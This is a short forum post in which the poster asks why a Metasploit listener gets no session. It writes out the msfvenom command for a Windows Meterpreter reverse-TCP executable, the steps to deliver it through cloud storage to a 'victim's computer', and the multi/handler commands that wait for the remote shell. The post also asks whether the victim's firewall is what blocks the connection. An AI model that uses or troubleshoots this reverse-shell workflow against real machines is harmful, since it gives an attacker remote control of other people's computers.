Hello, i have little problem in Metasploit. I can't get metasploit session. Metasploit is still listening. So i will tell you what i am doing.
Step 1: Creating Executable
Before all i create executable with msfvenom. Command finally look like
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=4444 -f exe > file.exe
Then I upload file on cloud storage and download this file from the victim's computer.
Step 2: Starting Metasploit
I start metasploit normally with msfconsole command.
Then i just type use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
exploit
Handler failed to bind to
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler. . .
Step 3: Run Exe File on Victim's Computer
Then i go to the victim's computer and i run file.exe
Still no change. Still starting payload handler.
I left it for 30 minutes and nothing.
Is it because of my computer is running on windows 10? or because victim have firewall?
I turned off the firewall and antivirus on my computer.
Comments
No Comments Exist
Be the first, drop a comment!